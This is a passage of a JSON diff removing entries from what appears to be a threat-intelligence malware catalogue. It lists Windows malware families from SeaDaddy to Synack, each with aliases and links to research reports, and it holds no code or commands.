"https://twitter.com/struppigel/status/791535679905927168" - ] - }, - "uuid": "9803b201-28e5-40c5-b661-c1a191388072", - "value": "ScreenLocker", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.seadaddy", - "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", - "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/" - ] - }, - "uuid": "1d07212e-6292-40a4-a5e9-30aef83b6207", - "value": "SeaDaddy", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.seasalt", - "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] - }, - "uuid": "d66f466a-e70e-4b62-9a04-d62eb41da15c", - "value": "SeaSalt", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.sedll", - 
"https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets", - "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html" - ] - }, - "uuid": "272268bb-2715-476b-a121-49142581c559", - "value": "SeDll", - "description": "" - }, - { - "meta": { - "synonyms": [ - "azzy", - "eviltoss" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.sedreco", - "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", - "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf", - "https://securelist.com/blog/research/72924/sofacy-apt-hits-high-profile-targets-with-updated-toolset/", - "http://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf" - ] - }, - "uuid": "21ab9e14-602a-4a76-a308-dbf5d6a91d75", - "value": "Sedreco", - "description": "" - }, - { - "meta": { - "synonyms": [ - "jhuhugit", - "jkeyskw", - "downrage", - "carberplike" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.seduploader", - "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", - "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part1.pdf", - "http://blog.trendmicro.com/trendlabs-security-intelligence/new-adobe-flash-zero-day-used-in-pawn-storm-campaign/", - "https://labsblog.f-secure.com/2015/09/08/sofacy-recycles-carberp-and-metasploit-code/", - "http://www.welivesecurity.com/2015/07/10/sednit-apt-group-meets-hacking-team/", - "http://blog.trendmicro.com/trendlabs-security-intelligence/new-adobe-flash-zero-day-used-in-pawn-storm-campaign/", - "https://www.welivesecurity.com/2017/05/09/sednit-adds-two-zero-day-exploits-using-trumps-attack-syria-decoy/", - "https://blog.xpnsec.com/apt28-hospitality-malware-part-2/", - 
"https://www.fireeye.com/blog/threat-research/2017/08/apt28-targets-hospitality-sector.html", - "https://www.proofpoint.com/us/threat-insight/post/apt28-racing-exploit-cve-2017-11292-flash-vulnerability-patches-are-deployed", - "http://blog.talosintelligence.com/2017/10/cyber-conflict-decoy-document.html", - "https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/" - ] - }, - "uuid": "6bd20349-1231-4aaa-ba2a-f4b09d3b344c", - "value": "Seduploader", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.sendsafe" - ] - }, - "uuid": "503ca41c-7788-477c-869b-ac530f20c490", - "value": "SendSafe", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.serpico" - ] - }, - "uuid": "0d4ca924-7e7e-4385-b14d-f504b4d206e5", - "value": "Serpico", - "description": "" - }, - { - "meta": { - "synonyms": [ - "XShellGhost" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.shadowpad", - "https://securelist.com/shadowpad-in-corporate-networks/81432/", - "https://cdn.securelist.com/files/2017/08/ShadowPad_technical_description_PDF.pdf", - "http://www.dailysecu.com/?mod=bbs&act=download&bbs_id=bbs_10&upload_idxno=4070" - ] - }, - "uuid": "e089e945-a523-4d11-a135-396f9b6c1dc7", - "value": "ShadowPad", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.shakti", - "https://blog.malwarebytes.com/threat-analysis/2016/08/shakti-trojan-technical-analysis/amp/", - "https://blog.malwarebytes.com/threat-analysis/2016/08/shakti-trojan-stealing-documents/" - ] - }, - "uuid": "f64683c8-50ab-42c0-8b90-881598906528", - "value": "Shakti", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.shapeshift", - "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html" - ] - }, - "uuid": "15dd8386-f11a-485a-b719-440c0a47dee6", - "value": "SHAPESHIFT", - "description": "" - }, - { - "meta": { - "synonyms": [ - "remotecmd" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.shareip", - "https://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong" - ] - }, - "uuid": "6f9ed0b0-63c8-4f51-8425-17cfc2b3c12e", - "value": "shareip", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Bitrep" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.sharpknot", - "https://www.us-cert.gov/sites/default/files/publications/MAR-10135536.11.WHITE.pdf", - "https://eromang.zataz.com/tag/agentbase-exe/" - ] - }, - "uuid": "d31f1c73-d14b-41e2-bb16-81ee1d886e43", - "value": "SHARPKNOT", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.shelllocker", - "https://twitter.com/JaromirHorejsi/status/813726714228604928" - ] - }, - "uuid": "af35e295-7087-4f6c-9f70-a431bf223822", - "value": "ShellLocker", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.shifu", - "http://researchcenter.paloaltonetworks.com/2017/01/unit42-2016-updates-shifu-banking-trojan/" - ] - }, - "uuid": "6e668c0c-7085-4951-87d4-0334b6a5cdb3", - "value": "Shifu", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.shimrat", - "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf" - ] - }, - "uuid": "67fc358f-da6a-4f01-be23-44bc97319127", - "value": "Shim RAT", - "description": "" - }, - { - "meta": { - 
"synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.shujin", - "https://blog.trendmicro.com/trendlabs-security-intelligence/chinese-language-ransomware-makes-appearance/", - "http://www.nyxbone.com/malware/chineseRansom.html" - ] - }, - "uuid": "77c20bd9-5403-4f99-bae5-c54f3f38a6b6", - "value": "Shujin", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.shurl0ckr", - "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/shurl0ckr-ransomware-as-a-service-peddled-on-dark-web-can-reportedly-bypass-cloud-applications" - ] - }, - "uuid": "f544ee0e-26f4-48e7-aaee-056f4d1ced82", - "value": "Shurl0ckr", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Caphaw" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.shylock", - "https://securityintelligence.com/merchant-of-fraud-returns-shylock-polymorphic-financial-malware-infections-on-the-rise/", - "https://securityintelligence.com/shylocks-new-trick-evading-malware-researchers/", - "https://www.europol.europa.eu/newsroom/news/global-action-targeting-shylock-malware", - "https://www.virusbulletin.com/virusbulletin/2015/02/paper-pluginer-caphaw", - "http://contagiodump.blogspot.com/2011/09/sept-21-greedy-shylock-financial.html", - "https://malwarereversing.wordpress.com/2011/09/27/debugging-injected-code-with-ida-pro/" - ] - }, - "uuid": "515ee69a-298a-4fcf-bdb0-c5fc6d41872f", - "value": "Shylock", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.sidewinder", - "https://medium.com/@Sebdraven/apt-sidewinder-tricks-powershell-anti-forensics-and-execution-side-loading-5bc1a7e7c84c", - "https://s.tencent.com/research/report/479.html" - ] - }, - "uuid": "3c43bd4c-8c40-47b5-ae97-3dd0f0c0e8d8", - "value": "win.sidewinder", - 
"description": "" - }, - { - "meta": { - "synonyms": [ - "Destover" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.sierras", - "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group", - "https://securingtomorrow.mcafee.com/mcafee-labs/analyzing-operation-ghostsecret-attack-seeks-to-steal-data-worldwide/" - ] - }, - "uuid": "da92c927-9b31-48aa-854a-8ed49a29565b", - "value": "Sierra(Alfa,Bravo, ...)", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.siggen6" - ] - }, - "uuid": "c12b3e30-32bf-4b7e-98f6-6a00e95553f8", - "value": "Siggen6", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.silence", - "https://securelist.com/the-silence/83009/", - "http://www.intezer.com/silenceofthemoles/", - "https://www.group-ib.com/resources/threat-research/silence.html" - ] - }, - "uuid": "0df52c23-690b-4703-83f7-5befc38ab376", - "value": "Silence", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.silon", - "http://contagiodump.blogspot.com/2009/11/new-banking-trojan-w32silon-msjet51dll.html", - "http://www.internetnews.com/security/article.php/3846186/TwoHeaded+Trojan+Targets+Online+Banks.htm" - ] - }, - "uuid": "b602edb3-81c2-4772-b5f8-73deb85cb40a", - "value": "Silon", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.siluhdur" - ] - }, - "uuid": "774fcb67-1eeb-4bda-9b36-b624b632417a", - "value": "Siluhdur", - "description": "" - }, - { - "meta": { - "synonyms": [ - "iBank" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.simda", - "https://secrary.com/ReversingMalware/iBank/" - ] - }, - "uuid": 
"467ee29c-317f-481a-a77c-69961eb88c4d", - "value": "Simda", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Theola", - "Quarian", - "Mebroot", - "Anserin", - "Torpig" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.sinowal", - "https://en.wikipedia.org/wiki/Torpig", - "https://www.symantec.com/security_response/writeup.jsp?docid=2008-010718-3448-99&tabid=2", - "https://www.welivesecurity.com/2013/03/13/how-theola-malware-uses-a-chrome-plugin-for-banking-fraud/", - "https://www.virusbulletin.com/virusbulletin/2014/06/sinowal-banking-trojan" - ] - }, - "uuid": "ad5bcaef-1a86-4cc7-8f2e-32306b995018", - "value": "Sinowal", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.sisfader", - "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/june/cve-2017-8750-rtf-and-the-sisfader-rat/", - "https://medium.com/@Sebdraven/gobelin-panda-against-the-bears-1f462d00e3a4" - ] - }, - "uuid": "0fba78fc-47a1-45e1-b5df-71bcabd23b5d", - "value": "Sisfader", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.skarab_ransom", - "http://malware-traffic-analysis.net/2017/11/23/index.html" - ] - }, - "uuid": "c1ccba65-e2f0-4f29-8e04-6b119c7f8694", - "value": "Skarab Ransom", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.skyplex" - ] - }, - "uuid": "39002a0d-99aa-4568-b110-48f6df1759cd", - "value": "Skyplex", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.slave", - "https://www.cert.pl/en/news/single/slave-banatrix-and-ransomware/" - ] - }, - "uuid": "1f4d8d42-8f31-47f8-b2b7-2d43196de532", - "value": "Slave", - "description": "" - }, - { - "meta": { - 
"synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.slingshot", - "https://securelist.com/apt-slingshot/84312/", - "https://s3-eu-west-1.amazonaws.com/khub-media/wp-content/uploads/sites/43/2018/03/09133534/The-Slingshot-APT_report_ENG_final.pdf", - "https://www.cyberscoop.com/kaspersky-slingshot-isis-operation-socom-five-eyes/" - ] - }, - "uuid": "d6178858-1244-41cf-aeed-8c6afc1d6846", - "value": "Slingshot", - "description": "- 2012 first sighted\r\n- Attack vector via compromised Microtik routers where victim's got infection when they connect to Microtik router admin software - Winbox\r\n- 2018 when discovered by Kaspersky Team\r\n\r\nInfection Vector\r\n- Infected Microtik Router > Malicious DLL (IP4.dll) in Router > User connect via windbox > Malicious DLL downloaded on computer" - }, - { - "meta": { - "synonyms": [ - "speccom" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.smac", - "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/Aug.10.The_Italian_Connection_An_analysis_of_exploit_supply_chains_and_digital_quartermasters/HTExploitTelemetry.pdf" - ] - }, - "uuid": "a8561caf-eb9f-4a02-8277-a898a0a259ae", - "value": "smac", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Dofoil" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader", - "https://cloudblogs.microsoft.com/microsoftsecure/2018/04/04/hunting-down-dofoil-with-windows-defender-atp/", - "https://eternal-todo.com/blog/smokeloader-analysis-yulia-photo", - "https://blog.talosintelligence.com/2018/07/smoking-guns-smoke-loader-learned-new.html", - "https://blog.malwarebytes.com/threat-analysis/2016/10/new-looking-sundown-ek-drops-smoke-loader-kronos-banker/", - "https://info.phishlabs.com/blog/smoke-loader-adds-additional-obfuscation-methods-to-mitigate-analysis", - 
"https://www.spamhaus.org/news/article/774/smoke-loader-improves-encryption-after-microsoft-spoils-its-campaign", - "https://malwarebreakdown.com/2017/04/03/shadow-server-domains-leads-to-rig-exploit-kit-dropping-smoke-loader-which-downloads-neutrino-bot-aka-kasidet/", - "https://blog.malwarebytes.com/cybercrime/2018/01/fake-spectre-and-meltdown-patch-pushes-smoke-loader/", - "https://int0xcc.svbtle.com/a-taste-of-our-own-medicine-how-smokeloader-is-deceiving-dynamic-configuration-extraction-by-using-binary-code-as-bait", - "https://blog.malwarebytes.com/threat-analysis/2016/08/smoke-loader-downloader-with-a-smokescreen-still-alive/", - "https://blog.badtrace.com/post/anti-hooking-checks-of-smokeloader-2018/", - "https://www.cert.pl/en/news/single/dissecting-smoke-loader/" - ] - }, - "uuid": "ba91d713-c36e-4d98-9fb7-e16496a69eec", - "value": "SmokeLoader", - "description": "The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body." 
- }, - { - "meta": { - "synonyms": [ - "Ismo" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.smominru", - "https://www.proofpoint.com/us/threat-insight/post/smominru-monero-mining-botnet-making-millions-operators", - "http://blog.netlab.360.com/mykings-the-botnet-behind-multiple-active-spreading-botnets/" - ] - }, - "uuid": "26b91007-a8ae-4e32-bd99-292e44735c3d", - "value": "Smominru", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.snatch_loader", - "https://myonlinesecurity.co.uk/your-order-no-8194788-has-been-processed-malspam-delivers-malware/", - "https://twitter.com/VK_Intel/status/898549340121288704", - "https://www.arbornetworks.com/blog/asert/snatchloader-reloaded/", - "https://zerophagemalware.com/2017/12/11/malware-snatch-loader-reloaded/" - ] - }, - "uuid": "467c726e-6e19-4d15-88b6-362cbe0b3d20", - "value": "SnatchLoader", - "description": "A downloader trojan with some infostealer capabilities focused on the browser. Previously observed as part of RigEK campaigns." 
- }, - { - "meta": { - "synonyms": [ - "ByeByeShell" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.sneepy", - "https://researchcenter.paloaltonetworks.com/2016/09/unit42-confucius-says-malware-families-get-further-by-abusing-legitimate-websites/" - ] - }, - "uuid": "212d1ed7-0519-412b-a1ce-56046ca93372", - "value": "SNEEPY", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Ursnif" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.snifula", - "https://www.circl.lu/assets/files/tr-13/tr-13-snifula-analysis-report-v1.3.pdf" - ] - }, - "uuid": "4f3ad937-bf2f-40cb-9695-a2bedfd41bfa", - "value": "Snifula", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.snojan", - "https://medium.com/@jacob16682/snojan-analysis-bb3982fb1bb9" - ] - }, - "uuid": "0646a6eb-1c13-4d87-878e-9431314597bf", - "value": "Snojan", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.snslocker" - ] - }, - "uuid": "99a10948-d7ba-4ad0-b73c-c7762143a193", - "value": "SNS Locker", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.sobaken", - "https://www.welivesecurity.com/2018/07/17/deep-dive-vermin-rathole/" - ] - }, - "uuid": "81e4fc8f-7b05-42bf-8ff9-568362d4f964", - "value": "Sobaken", - "description": "According to ESET, this RAT was derived from (the open-source) Quasar RAT." 
- }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.socks5_systemz" - ] - }, - "uuid": "38734f44-ebc4-4250-a20e-5dac0fb5c0ed", - "value": "Socks5 Systemz", - "description": "" - }, - { - "meta": { - "synonyms": [ - "BIRDDOG", - "Nadrac" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.socksbot", - "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf", - "https://www.accenture.com/t00010101T000000Z__w__/gb-en/_acnmedia/PDF-83/Accenture-Goldfin-Security-Alert.pdf", - "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html" - ] - }, - "uuid": "da34bf80-6dc6-4b07-8094-8bed2c1176ec", - "value": "SocksBot", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Napolar" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.solarbot", - "https://www.welivesecurity.com/2013/09/25/win32napolar-a-new-bot-on-the-block/", - "https://blog.malwarebytes.com/threat-analysis/2013/09/new-solarbot-malware-debuts-creator-publicly-advertising/" - ] - }, - "uuid": "d61a1656-9413-46de-bd19-c7fe5eda3371", - "value": "Solarbot", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.soraya", - "https://www.codeandsec.com/Soraya-Malware-Analysis-Dropper", - "https://www.arbornetworks.com/blog/asert/the-best-of-both-worlds-soraya/" - ] - }, - "uuid": "26aa3c43-5049-4a2e-bec1-9709b31a1a26", - "value": "soraya", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.sorgu", - "https://www.symantec.com/blogs/threat-intelligence/leafminer-espionage-middle-east" - ] - }, - "uuid": "bc135ba5-637b-46c9-94fc-2eef5e018bb5", - "value": "Sorgu", - "description": "" - }, - { - 
"meta": { - "synonyms": [ - "denis" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.soundbite", - "https://attack.mitre.org/wiki/Software/S0157", - "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html" - ] - }, - "uuid": "f4cac204-3d3f-4bb6-84bd-fc27b2f5158c", - "value": "SOUNDBITE", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.spedear", - "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets" - ] - }, - "uuid": "bd29030e-d440-4842-bc2a-c173ed938da4", - "value": "Spedear", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.spora_ransom", - "http://malware-traffic-analysis.net/2017/01/17/index2.html", - "https://github.com/MinervaLabsResearch/SporaVaccination", - "https://www.linkedin.com/pulse/spora-ransomware-understanding-hta-infection-vector-kevin-douglas", - "https://blog.malwarebytes.com/threat-analysis/2017/03/spora-ransomware/", - "https://nakedsecurity.sophos.com/2017/06/26/how-spora-ransomware-tries-to-fool-antivirus/", - "https://www.gdatasoftware.com/blog/2017/01/29442-spora-worm-and-ransomware" - ] - }, - "uuid": "7eeafa7c-0282-4667-bb1a-5ebc3a845d6d", - "value": "Spora", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.spybot" - ] - }, - "uuid": "34e9d701-22a1-4315-891d-443edd077abf", - "value": "SpyBot", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.spynet_rat" - ] - }, - "uuid": "", - "value": "", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.squirtdanger", - 
"https://researchcenter.paloaltonetworks.com/2018/04/unit42-squirtdanger-swiss-army-knife-malware-veteran-malware-author-thebottle/" - ] - }, - "uuid": "858a2cdb-9c89-436a-b8d4-60c725c7ac63", - "value": "SquirtDanger", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.sslmm", - "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf", - "https://securelist.com/analysis/publications/69953/the-naikon-apt/", - "https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf" - ] - }, - "uuid": "009db412-762d-4256-8df9-eb213be01ffd", - "value": "SslMM", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.stabuniq", - "http://contagiodump.blogspot.com/2012/12/dec-2012-trojanstabuniq-samples.html", - "https://www.symantec.com/connect/blogs/trojanstabuniq-found-financial-institution-servers" - ] - }, - "uuid": "faa2196f-df4c-454c-995e-ded7864d5fa8", - "value": "Stabuniq", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.stampedo", - "https://www.bleepingcomputer.com/news/security/stampado-ransomware-campaign-decrypted-before-it-started/" - ] - }, - "uuid": "b1efbadf-26e5-4e35-8fd2-61642c30ecbf", - "value": "Stampedo", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.starcruft", - "https://securelist.com/operation-daybreak/75100/" - ] - }, - "uuid": "acd8fc63-c22a-4c11-907e-33e358fdd293", - "value": "StarCruft", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.starloader", - "https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-south-american-and-southeast-asian-governments" - ] - }, - "uuid": 
"f1decba9-6b3b-4636-a2b6-2208e178591a", - "value": "StarLoader", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.starsypound", - "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] - }, - "uuid": "6df9bbd4-ab32-4d09-afdb-97eed274520a", - "value": "StarsyPound", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.stegoloader", - "https://www.secureworks.com/research/stegoloader-a-stealthy-information-stealer" - ] - }, - "uuid": "aea21616-061d-4177-9512-8887853394ed", - "value": "StegoLoader", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.stinger" - ] - }, - "uuid": "82ab5235-a71e-4692-a08c-8db337d8b53a", - "value": "Stinger", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.stration" - ] - }, - "uuid": "0439c5ec-306e-4473-84f7-50bdb5539fc2", - "value": "Stration", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.stresspaint", - "https://security.radware.com/malware/stresspaint-malware-targeting-facebook-credentials/", - "https://arstechnica.com/information-technology/2018/04/tens-of-thousands-of-facebook-accounts-compromised-in-days-by-malware/", - "https://blog.radware.com/security/2018/04/stresspaint-malware-campaign-targeting-facebook-credentials/", - "https://www.bleepingcomputer.com/news/security/stresspaint-malware-steals-facebook-credentials-and-session-cookies/" - ] - }, - "uuid": "00dedcea-4f87-4b6d-b12d-7749281b1366", - "value": "Stresspaint", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ 
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.strongpity", - "https://securelist.com/blog/research/76147/on-the-strongpity-waterhole-attacks-targeting-italian-and-belgian-encryption-users/", - "https://twitter.com/physicaldrive0/status/786293008278970368", - "https://www.welivesecurity.com/2017/12/08/strongpity-like-spyware-replaces-finfisher/", - "https://citizenlab.ca/2018/03/bad-traffic-sandvines-packetlogic-devices-deploy-government-spyware-turkey-syria/" - ] - }, - "uuid": "da2969f2-01e9-4ca8-b2f3-5fc9a9891d57", - "value": "StrongPity", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.stuxnet", - "http://artemonsecurity.blogspot.de/2017/04/stuxnet-drivers-detailed-analysis.html" - ] - }, - "uuid": "6ad84f52-0025-4a9d-861a-65c870f47988", - "value": "Stuxnet", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.sunorcal", - "https://researchcenter.paloaltonetworks.com/2017/11/unit42-new-malware-with-ties-to-sunorcal-discovered/", - "http://pwc.blogs.com/cyber_security_updates/2016/03/index.html" - ] - }, - "uuid": "a51b82ba-7e32-4a8e-b5d0-8d0441bdcce4", - "value": "SunOrcal", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.suppobox" - ] - }, - "uuid": "dd9939a4-df45-4c7c-8a8d-83b40766aacd", - "value": "SuppoBox", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.swift", - "https://securelist.com/blog/sas/77908/lazarus-under-the-hood/" - ] - }, - "uuid": "8420653b-1412-45a1-9a2d-6aa9b9eaf906", - "value": "Swift?", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.sword", - 
"https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] - }, - "uuid": "2112870f-06f1-44a9-9c43-6cc4fb90e295", - "value": "Sword", - "description": "" - }, - { - "meta": { - "synonyms": [ - "getkys" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.sykipot", - "https://www.symantec.com/connect/blogs/sykipot-attacks", - "https://blog.trendmicro.com/trendlabs-security-intelligence/sykipot-now-targeting-us-civil-aviation-sector-information/", - "https://www.alienvault.com/blogs/labs-research/sykipot-is-back", - "https://community.rsa.com/thread/185437" - ] - }, - "uuid": "99ffeb75-8d21-43a2-b5f7-f58bcbac2228", - "value": "sykipot", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.synack", - 